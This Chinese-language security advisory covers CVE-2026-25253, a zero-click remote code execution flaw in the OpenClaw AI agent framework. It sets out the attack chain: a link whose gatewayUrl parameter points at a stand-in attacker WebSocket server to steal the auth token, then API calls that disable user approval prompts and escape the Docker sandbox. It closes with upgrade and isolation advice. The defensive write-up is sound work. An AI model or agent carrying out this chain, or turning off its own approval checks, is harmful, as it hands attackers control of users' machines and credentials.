文章总结： OpenClaw开源AIAgent框架发现高危零点击远程代码执行漏洞CVE-2026-25253，CVSS评分8.8，影响版本2026.1.29之前所有版本。攻击者只需诱导用户访问恶意网页即可在毫秒内完成WebSocket连接劫持、令牌窃取、沙箱逃逸和权限提升，实现对用户机器的完全控制。此外相关平台Moltbook泄露大量API密钥，加剧安全风险。文章建议用户立即升级至最新版本、轮换所有凭证并实施网络层隔离，同时提出AIAgent时代安全范式需向零信任架构转变。 综合评分： 85 文章分类： 漏洞预警,AI安全,应急响应,解决方案,安全大事件

紧急预警：OpenClaw惊现”零点击”超级漏洞，你的AI Agent可能已被劫持！

原创

ZM ZM

暗镜

2026年3月2日 06:18 北京

“只需访问一个网页，你的AI助手就会变成黑客的提权工具。”

这不是科幻电影的情节，而是刚刚发生在开源AI Agent框架OpenClaw上的真实安全灾难。Oasis安全研究团队最新披露，这个被誉为”史上增长最快”的AI Agent项目存在一个零交互远程代码执行（RCE）漏洞，让全球数十万开发者的机器暴露在裸奔状态。

💥 漏洞有多可怕？一次点击=全盘沦陷

漏洞编号： CVE-2026-25253

CVSS评分： 8.8（高危）

影响版本： 2026.1.29之前的所有版本

这个漏洞的恐怖之处在于它的”零交互”特性——攻击者不需要你安装任何插件、点击任何确认按钮，甚至不需要你主动执行任何操作。只要你的浏览器打开了一个恶意网页，攻击就在毫秒级时间内完成了。

攻击链解剖（全程仅需一次点击）：

1. 钓鱼链接：攻击者发送一个看似无害的链接，如 http://你的IP/chat?gatewayUrl=ws://黑客服务器.com
2. 自动连接：OpenClaw的Control UI盲目信任URL参数中的gatewayUrl，立即向黑客服务器建立WebSocket连接
3. 令牌泄露：在连接过程中，系统自动发送你的认证令牌（authToken）、设备ID和公钥到攻击者手中
4. 劫持网关：攻击者利用窃取的令牌，直接连接到你本地的OpenClaw网关（即使是仅监听localhost的实例也能被绕过，因为浏览器成为了”内鬼”桥梁）
5. 拆除护栏：通过API调用exec.approvals.set关闭用户确认提示，通过config.patch强制命令在宿主机而非Docker容器中执行
6. 完全控制：最终执行node.invoke，在受害者机器上运行任意代码，实现沙箱逃逸+权限提升的双重杀

整个过程在毫秒级完成，用户只看到网页加载了一下，后台已经完成了从入侵到提权的全套操作。

🎯 为什么OpenClaw成了”完美靶子”？

OpenClaw（前身为Clawdbot和MoltBot）自2025年11月发布以来，以惊人的速度席卷开发者社区——仅用5天就获得超过10万GitHub星标，目前星标数已突破14.9万。它定位为”自托管AI Agent”，运行在开发者本地机器上，能够连接消息应用、日历、开发工具甚至本地文件系统。

正是这种”高权限本地运行”的架构，让这次漏洞的杀伤力呈指数级放大：

• 超级权限：默认拥有访问文件系统、执行命令、读取敏感配置的能力
• 绕过隔离：即使部署在Docker中，漏洞也能直接逃逸到宿主机
• 信任陷阱：用户误以为”本地运行=安全”，反而降低了安全警惕
• LLM防护失效：OpenClaw内置的LLM安全护栏和沙箱机制完全无法防御此类架构层攻击（这些防护本是用来抵御提示词注入的，而非应用层漏洞）

正如发现该漏洞的安全研究员Mav Levin所言：”这些防御措施是为了限制LLM的恶意行为而设计的，用户可能以为它们能防护此类漏洞，但事实并非如此。”

🌐 更严峻的生态危机：API密钥大规模泄露

CVE-2026-25253并非OpenClaw安全风暴的孤例。就在该漏洞被披露的同时，与OpenClaw生态紧密相关的AI Agent社交平台Moltbook（非官方项目）被发现因数据库配置错误，导致大量机密API密钥完全公开暴露。

安全研究员Jamieson O’Reilly发现，攻击者可以冒充平台上的任何AI Agent（包括知名AI专家Andrej Karpathy的个人Agent）发布虚假信息、诈骗内容或激进言论。考虑到许多OpenClaw用户将具有短信读取和收件箱管理权限的Agent连接至该平台，风险呈连锁反应式扩散。

触目惊心的数据：

• 超过13.5万个OpenClaw实例暴露在互联网上
• 63%的实例存在远程代码执行漏洞
• 超过900个实例泄露了API密钥、聊天记录和OAuth令牌
• 18,000+实例被发现在配置文件中明文存储API密钥（OpenAI、Anthropic等）

🛡️ 紧急自救指南：现在必须做的3件事

1. 立即升级（生死时速） 将OpenClaw升级至v2026.1.29或更高版本，该版本已于2026年1月30日发布，修复了令牌泄露和WebSocket源验证问题。

2. 轮换所有凭证 如果你曾使用过旧版本，立即执行以下操作：

• 重置OpenClaw的authToken
• 轮换所有已连接的API密钥（OpenAI、Anthropic、云服务密钥等）
• 检查OAuth授权，撤销可疑的第三方访问

1. 网络层隔离（关键防御）

• 在浏览器层面实施严格的Content Security Policy (CSP)，限制不可信脚本的执行
• 使用独立的浏览器配置文件访问OpenClaw Control UI，避免与其他网页混用
• 在防火墙层面限制WebSocket出站连接，监控异常的ws://或wss://流量
• 考虑在 hardened container 或虚拟机中隔离运行OpenClaw，并严格限制网络出口

💡 深层反思：AI Agent时代的安全范式崩塌

OpenClaw漏洞事件暴露了一个被业界长期忽视的真相：我们正在将”上帝权限”授予AI Agent，却用防护普通应用的安全措施来保护它们。

传统的安全模型假设：

• 用户是权限的最高仲裁者
• 本地网络边界是有效的护城河
• 沙箱和LLM护栏能限制破坏范围

但在AI Agent时代，这些假设全部失效：

• Agent即用户：自动化决策取代了人工确认，攻击者只需欺骗Agent即可
• 浏览器即跳板：通过XSS和WebSocket劫持，外网攻击者可以穿透localhost边界
• 架构层漏洞绕过应用层防护：你再强大的提示词过滤，也防不住应用自身的逻辑缺陷

给开发者的建议：

1. 零信任架构：将AI Agent视为”已沦陷的高权限账户”，实施最小权限原则，绝不要给Agent root权限
2. 深度防御：不要依赖单一安全机制，结合网络隔离、行为监控、异常检测构建多层防线
3. 供应链审计：OpenClaw的”技能市场”已发现341+个恶意插件，务必审查每一个第三方扩展的代码
4. 安全左移：在Agent架构设计阶段就引入威胁建模，而非在漏洞爆发后才被动修补

📢 写在最后

OpenClaw的CVE-2026-25253漏洞是一个标志性事件——它预示着AI Agent正在成为网络攻击的”终极 payload”。当恶意网站可以静默劫持一个拥有文件系统、命令执行、网络访问权限的本地AI时，传统的”内外网隔离”概念已经名存实亡。

对于正在使用或计划部署OpenClaw的开发者，现在不是评估风险的时候，而是立即行动的时候。升级、轮换、隔离，三步缺一不可。

在AI Agent的时代，最危险的不再是病毒，而是我们赋予AI的过度信任。

参考资料：The Hacker News、SonicWall Capture Labs、多伦多大学安全公告、CVE-2026-25253官方通告

安全研究员：Mav Levin (DepthFirst), Peter Steinberger

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：暗镜 ZM ZM《紧急预警：OpenClaw惊现”零点击”超级漏洞，你的AI Agent可能已被劫持！》